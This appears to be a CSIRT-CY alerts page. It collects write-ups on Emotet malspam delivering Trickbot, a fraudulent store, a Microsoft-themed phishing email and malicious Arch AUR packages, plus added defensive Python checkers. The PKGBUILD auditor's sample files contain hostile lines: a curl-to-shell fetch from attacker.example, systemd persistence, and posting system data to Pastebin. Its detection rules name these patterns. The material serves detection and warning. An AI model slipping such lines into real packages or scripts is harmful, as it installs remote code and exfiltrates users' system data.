Alerts

Emotet and Trickbot are information stealers targeting Windows-based computers, and they are best known as banking malware. Each is typically distributed through its own distinct malicious spam (malspam) campaigns. However, we occasionally see both types of malware retrieved during a single infection chain. This Emotet+Trickbot combination doubles the danger for any vulnerable Windows host.

 

As 2018 progresses, Trickbot is still sent through its own malspam campaigns, but we continue to find examples of Trickbot using Emotet as an alternate distribution method. Most writeups about Emotet and Trickbot focus on individual malware characteristics, and they do little to paint a complete picture of a successful infection chain.

This blog post examines Emotet malspam so far in 2018, and we take a closer look at Emotet infection traffic featuring Trickbot as the follow-up malware.

 

Similarities

Although Emotet and Trickbot are from different malware families, they have some similarities. Both are information stealers that can load additional modules for functions like spamming or worm-based propagation. And for the last year or so, both have been distributed through malspam using Microsoft Word documents as the initial infection vector.

 

Emotet

Emotet was first reported in the summer of 2014 as banking malware, but has since evolved. By 2017, various sources reported Emotet acting as a loader for other malware like Dridex. One source reported Emotet loading Trickbot, so this most recent combination is not without precedent.

In 2018, Emotet infection traffic usually revealed the IcedID banking Trojan or Zeus Panda Banker as the follow-up malware. In June 2018, I started posting examples of Emotet infection traffic with Trickbot as its follow-up malware. We have also seen spambot malware as the follow-up malware, where the infected Windows host sends out more Emotet malspam.

An Emotet infection currently starts with a malicious macro in a Word document. Macros are disabled by default in Microsoft Office. If a user ignores the security warnings and enables macros on a vulnerable Windows host, the malicious Word document starts the infection chain. These macros are designed to retrieve the Emotet malware from compromised servers and infect the victim's computer.

Malspam pushing Emotet uses one of the two standard methods to deliver the initial Word document:

  1. Victims retrieve the initial Word document from a link in the email.
  2. The Word document is directly attached to a recipient’s email without any links.

Figure 1: Emotet infection chains so far in 2018.

 

Trickbot

Trickbot first appeared in the fall of 2016 and was initially described as the successor to Dyreza, another credential stealer. Trickbot is a modular malware with additional functions like an email spammer. Its most notable function is lateral movement. By July 2017, Trickbot added an SMB-based worm propagation module, but had not yet included an exploit.

Since June 2018, I have posted examples of Trickbot infection traffic with SMB propagation on malware-traffic-analysis.net, showing Trickbot moving from an infected Windows client to a vulnerable Active Directory (AD) domain controller. Trickbot's lateral movement over SMB is distinctly different from WannaCry's implementation of EternalBlue noted in 2017, so this method of SMB propagation appears to be based on a different exploit developed by the Trickbot authors.

Trickbot normally has its own malspam-based distribution channel, but now Trickbot attackers are also using Emotet for their infections.

 

Emotet Distribution

During the week starting Monday, June 11th 2018, we saw a great deal of IRS-themed malspam pushing Emotet to recipients in the United States. IRS was not the only theme, but it was by far the most prominent. In the days leading up to July 4th 2018, we also saw Independence Day-themed malspam pushing Emotet to recipients in the United States.

The following are some examples of spoofed senders and subject lines we have seen in malspam pushing Emotet since June 11th, 2018.

Spoofed senders:

  • From: [various spoofed sender names and email addresses]
  • From: Internal Revenue Service <[spoofed email address]>
  • From: Internal Revenue Service Online <[spoofed email address]>
  • From: Internal Revenue Service Online Center <[spoofed email address]>
  • From: IRS <[spoofed email address]>
  • From: IRS <irsonline@treasury.gov> <[spoofed email address]>
  • From: IRS <Press@treasury.gov> <[spoofed email address]>
  • From: IRS <Transcript@treasury.gov> <[spoofed email address]>
  • From: IRS Online Center <[spoofed email address]>
  • From: IRS.gov <[spoofed email address]>
  • From: Intuit <[spoofed email address]>
  • From: Intuit Online Payroll Support Team <[spoofed email address]>
  • From: Intuit Payroll <[spoofed email address]>
  • From: Intuit Payroll Services <[spoofed email address]>

Subject lines:

  • Subject: 4th of July congratulation
  • Subject: 4th of July eCard
  • Subject: 4th of July Greeting eCard
  • Subject: Happy 4th of July Greeting Message
  • Subject: Record of Account Transcript from June 14, 2018
  • Subject: Tax Account Transcript from June 14, 2018
  • Subject: The Fourth of July wishes
  • Subject: Verification of Non-filing Letter
  • Subject: Verification of Non-filing Letter from 06/15/2018
  • Subject: Wage and Income Transcript
  • Subject: 0335363294
  • Subject: 2142 Payroll Summary
  • Subject: 3291 Payroll Summary
  • Subject: ACCOUNT#94895547-Milan Marsic
  • Subject: Engr. Abdul Rauf Invoice 8288592
  • Subject: Invoice 897614 from Patrick Bingham
  • Subject: Invoices Overdue
  • Subject: IRS Record of Account Transcript
  • Subject: IRS Record of Account Transcript from 06/14/2018
  • Subject: IRS Record of Account Transcript from 06/15/2018
  • Subject: IRS Record of Account Transcript from June 14, 2018
  • Subject: IRS Record of Account Transcript from June 15, 2018
  • Subject: IRS Tax Return Transcript from 06/12/2018
  • Subject: IRS Tax Return Transcript from June 11, 2018
  • Subject: IRS Tax Account Transcript
  • Subject: IRS Tax Account Transcript from 06/15/2018
  • Subject: IRS Tax Account Transcript from June 15, 2018
  • Subject: IRS Tax Return Transcript
  • Subject: IRS Verification of Non-filing Letter
  • Subject: IRS Verification of Non-filing Letter from 06/11/2018
  • Subject: IRS Verification of Non-filing Letter from 06/12/2018
  • Subject: IRS Verification of Non-filing Letter from June 11, 2018
  • Subject: IRS Verification of Non-filing Letter from June 14, 2018
  • Subject: IRS Wage and Income Transcript
  • Subject: IRS Wage and Income Transcript from 06/14/2018
  • Subject: IRS Wage and Income Transcript from June 11, 2018
  • Subject: IRS Wage and Income Transcript from June 15, 2018
  • Subject: New Invoice / WM2708 / RP# 09648
  • Subject: New Payroll Co.
  • Subject: NYPXV7-16497063849
  • Subject: Pay Invoice
  • Subject: Payment
  • Subject: Payroll Tax Payment
  • Subject: Scott Crowe The 4th of July Greeting eCard

Each of these emails has had either an attached Word document or a link to download the Word document.
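Several of the spoofed senders above carry a look-alike address inside the display name (for example "IRS <irsonline@treasury.gov> <[spoofed email address]>") while the real sending address is something else. The following is an added example written for this page, not code from the original post or from Palo Alto Networks: it parses that From-header shape, compares the embedded address with the actual sender domain, checks the claimed brand against an assumed list of legitimate domains (an assumption, not from the post), and matches the subject against the themes listed above.

```python
import re

# Added example for this page, not code from the original post or from Palo Alto Networks.
ANGLE_ADDR = re.compile(r"<([^<>\s]+@[^<>\s]+)>")
BARE_ADDR = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")

# Assumed legitimate domains for the impersonated brands (assumption, not from the post;
# adjust to what your own mail actually shows).
BRAND_DOMAINS = {
    "internal revenue service": {"irs.gov", "treasury.gov"},
    "irs": {"irs.gov", "treasury.gov"},
    "intuit": {"intuit.com"},
}

# Subject themes taken from the list of observed subject lines above.
SUBJECT_THEMES = re.compile(
    r"record of account transcript|tax (account|return) transcript|"
    r"wage and income transcript|verification of non-filing letter|"
    r"4th of july|fourth of july", re.I)


def parse_from(header):
    """Split a From header into (display_text, sender_address, addresses_inside_display).

    The last angle-bracketed address is the one mail servers act on; everything before it
    is free text, which in this campaign often contains a second, look-alike address,
    as in 'IRS <irsonline@treasury.gov> <real-sender>'."""
    matches = list(ANGLE_ADDR.finditer(header))
    if not matches:
        return "", header.strip().lower(), []
    last = matches[-1]
    display = header[:last.start()].strip()
    embedded = [a.lower() for a in BARE_ADDR.findall(display)]
    return display, last.group(1).lower(), embedded


def domain_of(addr):
    return addr.rsplit("@", 1)[-1]


def assess(from_header, subject):
    """Return the list of reasons a message resembles the Emotet malspam described above."""
    display, sender, embedded = parse_from(from_header)
    sender_domain = domain_of(sender)
    reasons = []
    for emb in embedded:
        if domain_of(emb) != sender_domain:
            reasons.append(f"display name shows {emb} but the message is from {sender}")
    name = display.lower()
    for brand, domains in BRAND_DOMAINS.items():
        if re.search(rf"\b{re.escape(brand)}\b", name) and sender_domain not in domains:
            reasons.append(f"display name claims {brand!r} but the sender domain is {sender_domain}")
            break
    if SUBJECT_THEMES.search(subject):
        reasons.append("subject matches a theme from the June/July 2018 campaign")
    return reasons


# Constructed sample headers modelled on the spoofed senders and subjects listed above.
SAMPLES = [
    ("IRS <irsonline@treasury.gov> <irs@spoofed.example>",
     "IRS Record of Account Transcript from 06/14/2018"),
    ("Intuit Payroll <billing@spoofed.example>", "2142 Payroll Summary"),
    ("Alice <alice@example.com>", "Lunch on Friday"),
]

if __name__ == "__main__":
    for frm, subj in SAMPLES:
        print(f"{frm!r} / {subj!r}")
        for r in assess(frm, subj):
            print("   -", r)
```

A hit is a review flag for a mail gateway or triage script, not a verdict; the brand-domain table is the part to tune for your own environment.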

Figure 2: Emotet Word document distributed through a link in the malspam.

 

 

Figure 3: Emotet Word document distributed as an attached file.

 

Emotet Levels Jump Drastically Starting in May 2018

AutoFocus shows an increasing trend in Emotet malspam during the past year, with a very sharp jump in Emotet Word documents beginning in May 2018. Below are graphs for verified hits on Emotet from links or as attachments. Link hits are the number of times we verified requests for URLs to download an Emotet Word document. Attachment hits are the number of emails seen with an Emotet Word document attached to the message.

 

Emotet Infection in an Active Directory Environment

A malware-traffic-analysis.net blog post from June 15th 2018 provides an example of infection traffic from Emotet malspam. This analysis was done in an Active Directory (AD) environment with a domain controller running an unpatched version of Windows Server 2008 R2. The Windows client was running an unpatched version of Windows 7 Professional Service Pack 1.

Figure 6: A successful Emotet + Trickbot infection chain in an AD environment.

 

Figure 7: Traffic from the infection filtered in Wireshark.

 

Figure 7 shows the initial infection traffic from Emotet on a Windows client at 192.168.200.95, followed by Trickbot infection traffic on the same host.

Trickbot propagated from the Windows client to the vulnerable domain controller at 192.168.200.4 via SMB. Approximately 20 minutes later, the vulnerable AD domain controller showed signs of a Trickbot infection.

Figure 8 shows traffic where Trickbot was sent to the domain controller at 192.168.200.4.

Figure 8: SMB traffic in Wireshark where Trickbot was sent to the domain controller.

 

Conclusion

This activity combines the increasing amount of mass distribution for Emotet with the lateral movement capabilities of Trickbot. An Emotet+Trickbot combination represents a more potent infection, and it doubles the danger for any vulnerable Windows host.

Organizations with decent spam filtering, proper system administration, and up-to-date Windows hosts have a much lower risk of infection. Palo Alto Networks customers are further protected from this threat. Our threat prevention platform detects both Emotet and Trickbot malware. AutoFocus users can track this activity using the Emotet and Trickbot tags.

We will continue to investigate this activity for applicable indicators to further inform the community and enhance our threat prevention platform.

 

Appendix A

Hits for Emotet Word documents from May 2017 through May 2018:

Month/Year: Links – Attachments – Total

  • May 2017: 8,423 – 1,421 – 9,844
  • Jun 2017: 1,154 – 173 – 1,327
  • Jul 2017: 2,868 – 390 – 3,258
  • Aug 2017: 3,273 – 3,803 – 7,076
  • Sep 2017: 4,650 – 2,211 – 6,861
  • Oct 2017: 9,289 – 3,407 – 12,696
  • Nov 2017: 10,676 – 1,737 – 12,413
  • Dec 2017: 10,499 – 217 – 10,716
  • Jan 2018: 5,287 – 2 – 5,289
  • Feb 2018: 16,637 – 265 – 16,902
  • Mar 2018: 29,801 – 2,680 – 32,481
  • Apr 2018: 6,138 – 3,533 – 9,671
  • May 2018: 13,150 – 289,308 – 302,458

 

Appendix B

Hits for Emotet Word documents in May 2018:

Date: Links – Attachments – Total

  • 2018-05-01: 383 – 0 – 383
  • 2018-05-02: 45 – 437 – 482
  • 2018-05-03: 43 – 150 – 193
  • 2018-05-04: 41 – 604 – 645
  • 2018-05-05: 38 – 0 – 38
  • 2018-05-06: 36 – 0 – 36
  • 2018-05-07: 218 – 711 – 929
  • 2018-05-08: 476 – 9 – 485
  • 2018-05-09: 65 – 1 – 66
  • 2018-05-10: 155 – 957 – 1,112
  • 2018-05-11: 47 – 25 – 72
  • 2018-05-12: 26 – 0 – 26
  • 2018-05-13: 45 – 5 – 50
  • 2018-05-14: 350 – 19 – 369
  • 2018-05-15: 1,274 – 325 – 1,599
  • 2018-05-16: 1,119 – 10,929 – 12,048
  • 2018-05-17: 746 – 19,311 – 20,057
  • 2018-05-18: 386 – 27,437 – 27,823
  • 2018-05-19: 61 – 270 – 331
  • 2018-05-20: 60 – 234 – 294
  • 2018-05-21: 1,632 – 9,098 – 10,730
  • 2018-05-22: 381 – 4,656 – 5,037
  • 2018-05-23: 920 – 7,050 – 7,970
  • 2018-05-24: 536 – 5,169 – 5,705
  • 2018-05-25: 481 – 4,206 – 4,687
  • 2018-05-26: 78 – 134 – 212
  • 2018-05-27: 171 – 743 – 914
  • 2018-05-28: 734 – 13,105 – 13,839
  • 2018-05-29: 1,678 – 35,909 – 37,587
  • 2018-05-30: 566 – 109,409 – 109,975
  • 2018-05-31: 359 – 38,405 – 38,764
  • Totals: 13,150 – 289,308 – 302,458

 

The information contained in this website is for general information purposes only. The information is gathered from Research Center – Paloalto Networks while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

The website “Drop Savings Now” at www.dropsavingsnow.com is another fraudulent website that claims to provide discounts or savings on products. Online users are advised to stay away from the fake online store, or else they run the risk of their personal and credit card information getting stolen and used fraudulently by cybercriminals.

The fraudulent website collects personal and financial information but doesn’t provide a secure connection that is required by all websites that request such sensitive information.

Online users who have used their credit cards on dropsavingsnow.com are asked to contact their banks for help. They should let their banks know that they have unknowingly used their credit cards on a fraudulent website. Their banks should investigate, cancel the transactions and refund their money. They may also need to cancel the same credit cards and get new ones to prevent the scammers from continuously charging them.

 

 

The information is gathered from Online Threat Alerts.

The email messages below with the subject: “Account Suspension: violation notice,” which claim that the recipients’ Hotmail, Outlook or Live email accounts will be suspended because they violated Microsoft’s terms and service, are phishing scams sent by cybercriminals to frighten the recipients into clicking on a link within the same email message. The link in the fake email messages goes to a phishing website that will ask the recipients who have clicked on it to sign-in with their usernames and passwords to resolve the issue. But, once the requested information is submitted, it will be sent to the cybercriminals behind the phishing scam.

To protect against phishing scams, online users are asked to never click on a link to sign into their online accounts. They should instead, go directly to their online account provider’s website by typing the website’s address in their web browsers, or use a popular search engine to find their online provider’s website.

 

The “Microsoft Account Violation” Phishing Email

From: Microsoft.com Team <kenan_polutan@live.com>

Date: 16 July 2018 at 11:18:09 pm AEST

Subject: Account Suspension: violation notice

VIOLATION OF TERMS OF SERVICE

Your account will be suspended from sending maiIs due to violation of terms of service.

All saved maiIs will be lost if this is not resolved.

Activate And Resolve Issue Now Urgently!

Sincerely,

Customer Care Team ©2018

 

Once cybercriminals have gotten their potential victims’ account credentials (usernames and passwords), they will use it to hijack their Microsoft accounts and use them fraudulently. Therefore, recipients of the phishing email message who were tricked into clicking on the link within it and have attempted to sign into the phishing or fake website that they were taken, are asked to change their Microsoft account passwords immediately, before they are hijacked and used fraudulently by cybercriminals.

Hotmail or Microsoft email account users who have received suspicious email messages can verify the authenticity of email messages by going directly to www.hotmail.com, www.live.com or www.outlook.com and signing into their accounts from there. If there is something wrong with their accounts, they will be notified once they have signed in.

 

The information is gathered from Online Threat Alerts.

Yet another incident which showcases that you should not explicitly trust user-controlled software repositories.

Arch Linux, one of the most popular Linux distros, has pulled three packages from its user-maintained AUR software repository after they were found to be hosting malicious code.

Arch Linux is an independently developed, general-purpose GNU/Linux distribution composed predominantly of free and open-source software, and supports community involvement.

Besides official repositories like Arch Build System (ABS), Arch Linux users can also download software packages from several other repositories, including AUR (Arch User Repository), a community-driven repository created and managed by Arch Linux users.

 

Since AUR packages are user-produced content, Arch maintainers always advise users to carefully check all files, especially the PKGBUILD and any .install file, for malicious commands.

However, this AUR repository has recently been found hosting malware code in several instances, including a PDF viewer.

 

Compromised PDF Viewer Found on Arch Linux AUR

On June 7, a malicious user nicknamed “xeactor” adopted an orphaned package (software without an active maintainer) called “acroread” which functions as a PDF viewer, and modified it to add malicious code.

As per a Git commit to the package’s source code, xeactor added malicious code that used curl to download a script which, in turn, would install and run a further script from a remote server.

This script installs a persistent component that meddles with “systemd”, reconfiguring it so that the component runs every 360 seconds.

The investigation revealed that the malicious script was designed to collect data on the infected systems to retrieve the following information:

  • Date and Time
  • Machine’s ID
  • Pacman information (package management utility)
  • The output of the “uname -a” command
  • CPU Information
  • The output of “systemctl list-units” command

The collected data would then be posted in a Pastebin document.

Fortunately, a code analysis discovered the modifications in due time and revealed that the scripts did not appear to be a serious threat, but payloads can be manipulated by the attacker at any time to push sophisticated malicious code.

As soon as this was discovered, the AUR maintainers reverted the changes made to the package, suspended xeactor’s account, and also found two more packages that xeactor had recently adopted and modified in the same manner.
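The advice above is to check the PKGBUILD and any .install file for malicious commands; the acroread case shows what to look for: a build-time fetch of a remote script, persistence through systemd, and system data posted to Pastebin. The following is an added example for this page, not the AUR team's tooling or the real acroread diff: a line-level review checker with constructed sample files (the planted lines are illustrations of the described behaviour, and attacker.example is a placeholder host).

```python
import re

# Heuristic review flags for PKGBUILD / .install files, an added example written for
# this page (not the AUR team's tooling). Each rule is a line-level predicate; a hit means
# "look at this line", not "this package is malicious".
RULES = [
    ("remote content piped straight into a shell",
     lambda l: re.search(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", l)),
    ("network fetch inside a function (sources belong in the source=() array)",
     lambda l: re.search(r"\b(curl|wget)\b", l) and not l.lstrip().startswith("source=")),
    ("systemd unit written outside $pkgdir (host persistence, not packaging)",
     lambda l: re.search(r"/(etc|usr/lib)/systemd/", l) and "pkgdir" not in l),
    ("script enables or reloads a service itself",
     lambda l: re.search(r"\bsystemctl\b", l)),
    ("data sent to a paste site",
     lambda l: re.search(r"pastebin\.com", l, re.I)),
]


def audit(text):
    """Return [(line_no, rule_description, line)] for every rule hit; comment lines are skipped."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        for desc, check in RULES:
            if check(line):
                findings.append((no, desc, line.strip()))
    return findings


# Constructed sample files. The clean PKGBUILD mirrors ordinary packaging; the planted
# lines imitate the behaviour described above (fetch and run a remote script, persist
# via a systemd timer, post system data to Pastebin). They are illustrations, not
# the real acroread commit.
CLEAN_PKGBUILD = """\
pkgname=acroread
pkgver=9.5.5
pkgrel=8
source=("https://example.test/AdbeRdr${pkgver}_i486linux_enu.tar.bz2")
package() {
  install -Dm644 "$srcdir/acroread.desktop" "$pkgdir/usr/share/applications/acroread.desktop"
}
"""

PLANTED_PKGBUILD = CLEAN_PKGBUILD + """\
# constructed: what an unexpected build-time fetch looks like
prepare() {
  curl -s https://attacker.example/payload.sh | sh
}
"""

PLANTED_INSTALL = """\
post_install() {
  install -Dm644 /tmp/x.timer /etc/systemd/system/x.timer
  systemctl enable --now x.timer
  uname -a | curl -X POST --data-binary @- https://pastebin.com/api/api_post.php
}
"""

if __name__ == "__main__":
    for name, text in [("PKGBUILD", PLANTED_PKGBUILD), ("acroread.install", PLANTED_INSTALL)]:
        for no, desc, line in audit(text):
            print(f"{name}:{no}: {desc}\n    {line}")
```

Run it against the files of a package before building, and in particular against the diff of a newly adopted package, since an orphaned package changing maintainer is exactly the moment this kind of change appears.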

 

The information is gathered from The Hacker News.

Domain Name Server (DNS) hijacking, also named DNS redirection, is a type of DNS attack in which DNS queries are incorrectly resolved in order to unexpectedly redirect users to malicious sites. To perform the attack, perpetrators either install malware on user computers, take over routers, or intercept or hack DNS communication.

DNS hijacking can be used for pharming (in this context, attackers typically display unwanted ads to generate revenue) or for phishing (displaying fake versions of sites users access and stealing data or credentials).

Many Internet Service Providers (ISPs) also use a type of DNS hijacking, to take over a user’s DNS requests, collect statistics and return ads when users access an unknown domain. Some governments use DNS hijacking for censorship, redirecting users to government-authorized sites.
